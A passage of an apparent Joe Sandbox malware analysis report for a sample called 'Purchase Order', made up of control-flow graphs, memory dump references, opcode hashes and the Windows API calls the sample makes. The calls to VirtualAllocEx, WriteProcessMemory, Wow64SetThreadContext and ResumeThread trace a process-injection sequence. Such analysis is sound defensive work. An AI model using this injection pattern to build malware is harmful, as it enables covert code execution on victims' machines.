                                                                            control_flow_graph 710 6d64290-6d64325 712 6d64327-6d64331 710->712 713 6d6435e-6d6437e 710->713 712->713 714 6d64333-6d64335 712->714 720 6d643b7-6d643e6 713->720 721 6d64380-6d6438a 713->721 715 6d64337-6d64341 714->715 716 6d64358-6d6435b 714->716 718 6d64345-6d64354 715->718 719 6d64343 715->719 716->713 718->718 722 6d64356 718->722 719->718 727 6d6441f-6d644d9 CreateProcessA 720->727 728 6d643e8-6d643f2 720->728 721->720 723 6d6438c-6d6438e 721->723 722->716 725 6d64390-6d6439a 723->725 726 6d643b1-6d643b4 723->726 729 6d6439e-6d643ad 725->729 730 6d6439c 725->730 726->720 741 6d644e2-6d64568 727->741 742 6d644db-6d644e1 727->742 728->727 731 6d643f4-6d643f6 728->731 729->729 732 6d643af 729->732 730->729 733 6d643f8-6d64402 731->733 734 6d64419-6d6441c 731->734 732->726 736 6d64406-6d64415 733->736 737 6d64404 733->737 734->727 736->736 738 6d64417 736->738 737->736 738->734 752 6d6456a-6d6456e 741->752 753 6d64578-6d6457c 741->753 742->741 752->753 754 6d64570 752->754 755 6d6457e-6d64582 753->755 756 6d6458c-6d64590 753->756 754->753 755->756 759 6d64584 755->759 757 6d64592-6d64596 756->757 758 6d645a0-6d645a4 756->758 757->758 760 6d64598 757->760 761 6d645b6-6d645bd 758->761 762 6d645a6-6d645ac 758->762 759->756 760->758 763 6d645d4 761->763 764 6d645bf-6d645ce 761->764 762->761 766 6d645d5 763->766 764->763 766->766
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D644C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: ae968fb13a2233f73012c1c07c32becde8d4ca19156810bad4ad7ddd1d942bce
                                                                            • Instruction ID: b69a93d706b7257c911cd8cef1cdec740607787581313fffc10c42a4f541a1c7
                                                                            • Opcode Fuzzy Hash: ae968fb13a2233f73012c1c07c32becde8d4ca19156810bad4ad7ddd1d942bce
                                                                            • Instruction Fuzzy Hash: 72915A71D00219DFDB64CF69C8417EDBBF2BF49314F1485A9E809A7240DB74A985CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 767 c2b038-c2b057 768 c2b083-c2b087 767->768 769 c2b059-c2b066 call c2a3a0 767->769 771 c2b09b-c2b0dc 768->771 772 c2b089-c2b093 768->772 775 c2b068 769->775 776 c2b07c 769->776 778 c2b0e9-c2b0f7 771->778 779 c2b0de-c2b0e6 771->779 772->771 824 c2b06e call c2b2d0 775->824 825 c2b06e call c2b2e0 775->825 776->768 780 c2b11b-c2b11d 778->780 781 c2b0f9-c2b0fe 778->781 779->778 786 c2b120-c2b127 780->786 783 c2b100-c2b107 call c2a3ac 781->783 784 c2b109 781->784 782 c2b074-c2b076 782->776 785 c2b1b8-c2b278 782->785 788 c2b10b-c2b119 783->788 784->788 817 c2b280-c2b2ab GetModuleHandleW 785->817 818 c2b27a-c2b27d 785->818 789 c2b134-c2b13b 786->789 790 c2b129-c2b131 786->790 788->786 793 c2b148-c2b151 call c2a3bc 789->793 794 c2b13d-c2b145 789->794 790->789 798 c2b153-c2b15b 793->798 799 c2b15e-c2b163 793->799 794->793 798->799 800 c2b181-c2b185 799->800 801 c2b165-c2b16c 799->801 822 c2b188 call c2b5e0 800->822 823 c2b188 call c2b5b0 800->823 801->800 803 c2b16e-c2b17e call c2a3cc call c2a3dc 801->803 803->800 806 c2b18b-c2b18e 808 c2b190-c2b1ae 806->808 809 c2b1b1-c2b1b7 806->809 808->809 819 c2b2b4-c2b2c8 817->819 820 c2b2ad-c2b2b3 817->820 818->817 820->819 822->806 823->806 824->782 825->782
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C2B29E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: bc17ddcb4cd8b8ecc79c40ce0b502573e67578ac57a4d85f52423dd992de2c20
                                                                            • Instruction ID: a797940168d80ba3d567e048079b2963630b5f557083802ac782d955bf02f927
                                                                            • Opcode Fuzzy Hash: bc17ddcb4cd8b8ecc79c40ce0b502573e67578ac57a4d85f52423dd992de2c20
                                                                            • Instruction Fuzzy Hash: 0D818770A00B158FDB24DF29D45479ABBF1FF88304F00892EE49ACBA50DB74E959CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 826 c2590c-c259d9 CreateActCtxA 828 c259e2-c25a3c 826->828 829 c259db-c259e1 826->829 836 c25a4b-c25a4f 828->836 837 c25a3e-c25a41 828->837 829->828 838 c25a60 836->838 839 c25a51-c25a5d 836->839 837->836 841 c25a61 838->841 839->838 841->841
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C259C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: c596de0ca8e63372af7cc4ece48e4c094f07e37bfa92ddea5a02cfdb07188ca2
                                                                            • Instruction ID: 5c094010105233faa47b81221b0ed1006d2ac8a60fbb83d3856f41658a68938f
                                                                            • Opcode Fuzzy Hash: c596de0ca8e63372af7cc4ece48e4c094f07e37bfa92ddea5a02cfdb07188ca2
                                                                            • Instruction Fuzzy Hash: 0941F4B0C00719CFDB24DFA9C8857DEBBB5BF49304F20816AD408AB251DB75694ACF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 842 c244b4-c259d9 CreateActCtxA 845 c259e2-c25a3c 842->845 846 c259db-c259e1 842->846 853 c25a4b-c25a4f 845->853 854 c25a3e-c25a41 845->854 846->845 855 c25a60 853->855 856 c25a51-c25a5d 853->856 854->853 858 c25a61 855->858 856->855 858->858
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C259C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 48caee8f64ff154819685208b446f8f07c8e50658b0f0c575cdfafd2189bbaff
                                                                            • Instruction ID: cac501d0d19c4ddf1abf02ad73510cbe8d102f8960177b97e0939e8c4e2601d3
                                                                            • Opcode Fuzzy Hash: 48caee8f64ff154819685208b446f8f07c8e50658b0f0c575cdfafd2189bbaff
                                                                            • Instruction Fuzzy Hash: F641E2B0C00729CBDB24DFA9C884A9EBBF5BF49304F20805AD409AB251DB716945CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 859 6d64000-6d64056 862 6d64066-6d640a5 WriteProcessMemory 859->862 863 6d64058-6d64064 859->863 865 6d640a7-6d640ad 862->865 866 6d640ae-6d640de 862->866 863->862 865->866
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D64098
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 9106e54648eb3fe6ab44a952e7696d1bf2675b69769841c73fb7c3ff42c969fe
                                                                            • Instruction ID: 4fb687754d926deedd9622bda6726c4bbdde703367bf9fdd5b23613cf93e3d82
                                                                            • Opcode Fuzzy Hash: 9106e54648eb3fe6ab44a952e7696d1bf2675b69769841c73fb7c3ff42c969fe
                                                                            • Instruction Fuzzy Hash: 7E2169B1D003199FCB10CFAAC885BDEBBF5FF88310F10842AE919A7240D7789941CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 870 6d64008-6d64056 872 6d64066-6d640a5 WriteProcessMemory 870->872 873 6d64058-6d64064 870->873 875 6d640a7-6d640ad 872->875 876 6d640ae-6d640de 872->876 873->872 875->876
                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D64098
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 6c4292168beb9b0f58a67ca29984e8d258d9c43c70fac419baa13698667f91b5
                                                                            • Instruction ID: 3e108d12cd689a615d1926b274886fb0196e2fc196135f9b2ed252ea2b924620
                                                                            • Opcode Fuzzy Hash: 6c4292168beb9b0f58a67ca29984e8d258d9c43c70fac419baa13698667f91b5
                                                                            • Instruction Fuzzy Hash: A42136B1D003599FCB10CFAAC885BDEBBF5FF88310F10842AE919A7240D7789945CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 880 6d640f1-6d64185 ReadProcessMemory 884 6d64187-6d6418d 880->884 885 6d6418e-6d641be 880->885 884->885
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D64178
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: ed66f1127bda5dd952b112201a3b0b826414f436555c6455e7dce18a410c3f8f
                                                                            • Instruction ID: 161c814fc5f0f12959fa1604bc4900a6ca87b195a28c585321b74368c71eb8d4
                                                                            • Opcode Fuzzy Hash: ed66f1127bda5dd952b112201a3b0b826414f436555c6455e7dce18a410c3f8f
                                                                            • Instruction Fuzzy Hash: E32136B1D003499FCB10CFAAC845ADEBBF5FF48310F10842AE919A7240C7389945CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 889 6d63e6a-6d63ebb 892 6d63ebd-6d63ec9 889->892 893 6d63ecb-6d63efb Wow64SetThreadContext 889->893 892->893 895 6d63f04-6d63f34 893->895 896 6d63efd-6d63f03 893->896 896->895
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D63EEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 49a98a34d9f6e32ace772ce6b13f6ba0e7542e20ce1aec69c01a285f06a23fcc
                                                                            • Instruction ID: c09295fa97f3ca55d8ea8d0a4267be8e8b151b4ed1717618a826d25f34e16782
                                                                            • Opcode Fuzzy Hash: 49a98a34d9f6e32ace772ce6b13f6ba0e7542e20ce1aec69c01a285f06a23fcc
                                                                            • Instruction Fuzzy Hash: BF211A71D003099FDB10DFAAC4857EEBBF5EF88314F148429E819A7241D7789945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 900 6d63e70-6d63ebb 902 6d63ebd-6d63ec9 900->902 903 6d63ecb-6d63efb Wow64SetThreadContext 900->903 902->903 905 6d63f04-6d63f34 903->905 906 6d63efd-6d63f03 903->906 906->905
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D63EEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 3dc582d69660aa18eb68826f859ae8954d09fb17c2326636db86ba96ad760a80
                                                                            • Instruction ID: 1339fdf9b809cbbbc5f3382e2d805fd497246a5609848a92f57e651f86f6f6a8
                                                                            • Opcode Fuzzy Hash: 3dc582d69660aa18eb68826f859ae8954d09fb17c2326636db86ba96ad760a80
                                                                            • Instruction Fuzzy Hash: AE211871D003098FDB10DFAAC4857EEBBF4EF88324F14842AD419A7241D7789945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D64178
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 759128db9e7e810cd8965e221c03b829d905584de1e8fd174112499026c45305
                                                                            • Instruction ID: a3e1eca0c5fb31e3b470417e7b8ef11b090e2eff4f4d37306b5c48a90b68dbab
                                                                            • Opcode Fuzzy Hash: 759128db9e7e810cd8965e221c03b829d905584de1e8fd174112499026c45305
                                                                            • Instruction Fuzzy Hash: 87213AB1C003499FCB10DFAAC845ADEFBF5FF48310F10842AE519A7240C7389551DBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2D9A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 3292382bc73b80c788ac1ce3368d191bef410b20004dce486b9df4a31ce340da
                                                                            • Instruction ID: 8c4b2d14e563c341d428248455575c38accd7015ce90b15e64515c6ac8301fa3
                                                                            • Opcode Fuzzy Hash: 3292382bc73b80c788ac1ce3368d191bef410b20004dce486b9df4a31ce340da
                                                                            • Instruction Fuzzy Hash: 5A21E4B5D003099FDB10DF9AD984ADEBBF8FB48310F14801AE919A3310D374A944CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D63FB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 07abf045b07f6764d3f74ef35261653d475d15f5b0533bbed5d93b900db176b9
                                                                            • Instruction ID: be0bf9e45b8f75aa25c09a1c18d593ca056847c207b137f469a5933bd4f29724
                                                                            • Opcode Fuzzy Hash: 07abf045b07f6764d3f74ef35261653d475d15f5b0533bbed5d93b900db176b9
                                                                            • Instruction Fuzzy Hash: 121156B2C002499FCB10DFAAC845ADFBFF5EB89324F208419E919A7250C735A941CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C2B319,00000800,00000000,00000000), ref: 00C2B52A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: a9b0fab911bb68fd38b39607b7e5603b8554427365ba54df7d4b3053e5306d0e
                                                                            • Instruction ID: 4a8cd2e9361b48e376c2e3970a0012a7d53a23637fb565692d9c920c65276b86
                                                                            • Opcode Fuzzy Hash: a9b0fab911bb68fd38b39607b7e5603b8554427365ba54df7d4b3053e5306d0e
                                                                            • Instruction Fuzzy Hash: 951114B6C003098FCB10CF9AD444ADEFBF4EB48310F10842AE919A7600C375A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C2B319,00000800,00000000,00000000), ref: 00C2B52A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: b56523bcf9cd815e23dd4e2ef6dc556b74d4fa2cc22aedda72d32cfdbfa853e1
                                                                            • Instruction ID: 62d6692173af570badda95f63c86bf5d734748f8cffbd62a421ec28edca8b8f3
                                                                            • Opcode Fuzzy Hash: b56523bcf9cd815e23dd4e2ef6dc556b74d4fa2cc22aedda72d32cfdbfa853e1
                                                                            • Instruction Fuzzy Hash: 8E1114B6C003499FDB10CFAAD844ADEFBF4EB48310F14842ED429AB601C379A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D63FB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: c3f47f6f179912149b1811064fa02940a32619e979d9d50c8366e17d6e766d85
                                                                            • Instruction ID: f4a819cc9c0325d772b7a940695914962bcb6db762a66abfa72f64529012910c
                                                                            • Opcode Fuzzy Hash: c3f47f6f179912149b1811064fa02940a32619e979d9d50c8366e17d6e766d85
                                                                            • Instruction Fuzzy Hash: F21123B2D002499FCB10DFAAC845ADFBFF5EB88324F20841AE519A7250C775A945CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: cb9bc07020511934fc3a784d4680766a0b780287dc9ebee1fc018987c690cbf7
                                                                            • Instruction ID: 940213e772861b449cfa71a6186ce3d46baf8ebe54f739e6cec7a98f6199af51
                                                                            • Opcode Fuzzy Hash: cb9bc07020511934fc3a784d4680766a0b780287dc9ebee1fc018987c690cbf7
                                                                            • Instruction Fuzzy Hash: 8E1158B1D003498FCB20DFAAC8457DFFBF4EB88324F20841AD419A7240CB396945CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 06D68558
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            • Opcode ID: b495a9968d712029cdb1654e4fb50f279b054af1c93fce1f024bdce75a2cf130
                                                                            • Instruction ID: cadfa156691e222595384b660b83d765f275a519eca7c472805fc2ee1a6fb6af
                                                                            • Opcode Fuzzy Hash: b495a9968d712029cdb1654e4fb50f279b054af1c93fce1f024bdce75a2cf130
                                                                            • Instruction Fuzzy Hash: D91106B5C003499FCB10DF9AD945BEEBBF4EB48320F20845AE959A7340D738A544CFA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: baf8304e9de1432296de0e2d6bcf78dd0d414e0036d5d47a24c8da16dbb1cb5d
                                                                            • Instruction ID: 22da1cb22d0f2303dd9c7c89db7b769b8119d0f6b7bf82d0620701a8c477c7ee
                                                                            • Opcode Fuzzy Hash: baf8304e9de1432296de0e2d6bcf78dd0d414e0036d5d47a24c8da16dbb1cb5d
                                                                            • Instruction Fuzzy Hash: A91125B1D003498FDB20DFAAC8457DEFBF4EB88324F20841AD419A7240CB79A945CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C2B29E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: e4269c517ab24382e865f373ca7af92c9815e2347f2d3759d186002530e4248c
                                                                            • Instruction ID: 5360a73da2afb1abd154b9efbfafc71d5f6bfb11c0180bf93795e8f02642504e
                                                                            • Opcode Fuzzy Hash: e4269c517ab24382e865f373ca7af92c9815e2347f2d3759d186002530e4248c
                                                                            • Instruction Fuzzy Hash: A811E0B6C0035ACFCB10CF9AD444ADEFBF4EB88314F15841AD829A7610D379A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 06D68558
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            • Opcode ID: 7cf41ede5140c86093dd61a66f4bfe41e16c900640bee531d6155b4cfb4870d7
                                                                            • Instruction ID: 861aae6d76d6c2e9ae9aa2f7b1bd797a1cef3e9491aa677336d36822cd213e9d
                                                                            • Opcode Fuzzy Hash: 7cf41ede5140c86093dd61a66f4bfe41e16c900640bee531d6155b4cfb4870d7
                                                                            • Instruction Fuzzy Hash: 9E1103B5C003498FCB10DF9AC545BEEBBF4EB48320F20841AE969A7340D338A544CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D669ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 6e974ae09c17b74ffdf6c166c7366cc0619af752a7d42544469ceecd1cb08443
                                                                            • Instruction ID: d4e29609007ed9c3e65be88b525340d9b1a0c368ef4e439360c5a510f576dc12
                                                                            • Opcode Fuzzy Hash: 6e974ae09c17b74ffdf6c166c7366cc0619af752a7d42544469ceecd1cb08443
                                                                            • Instruction Fuzzy Hash: C91103B5C003499FDB10DF9AD849BDEFBF8EB48314F10841AE958A7200D375A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D669ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: d2eb5aa8337ceecc092348363f6a962dc9c42205d32ab5190ee8fafb0dc64c6d
                                                                            • Instruction ID: 74e15e3e2e6b978079788da3c2b076fc5b3ca16b6d1bb70d7b56102465855f49
                                                                            • Opcode Fuzzy Hash: d2eb5aa8337ceecc092348363f6a962dc9c42205d32ab5190ee8fafb0dc64c6d
                                                                            • Instruction Fuzzy Hash: F311F2B58002498FCB10CF9AD945BDEBBF4EB48324F24840AE559A7310C375AA44CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013209170.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_87d000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbce03d78a9017e4eda5d28d4aa3da584999caa7e97870bcdcae8e6806ecccb8
                                                                            • Instruction ID: 8a3f3944957736b9f80cdd2118f39e0546ef9e3fae580164c07f2a2f0c63a066
                                                                            • Opcode Fuzzy Hash: dbce03d78a9017e4eda5d28d4aa3da584999caa7e97870bcdcae8e6806ecccb8
                                                                            • Instruction Fuzzy Hash: 5421E2B1504304DFDB05DF14D9C0B16BB75FB94324F24C569D9098A25AC336E856C6A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013257256.000000000088D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0088D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_88d000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b512b1fa26ba9275f04c2bae9ba02c61c52d7e93a997cc8a6759c898487d9e74
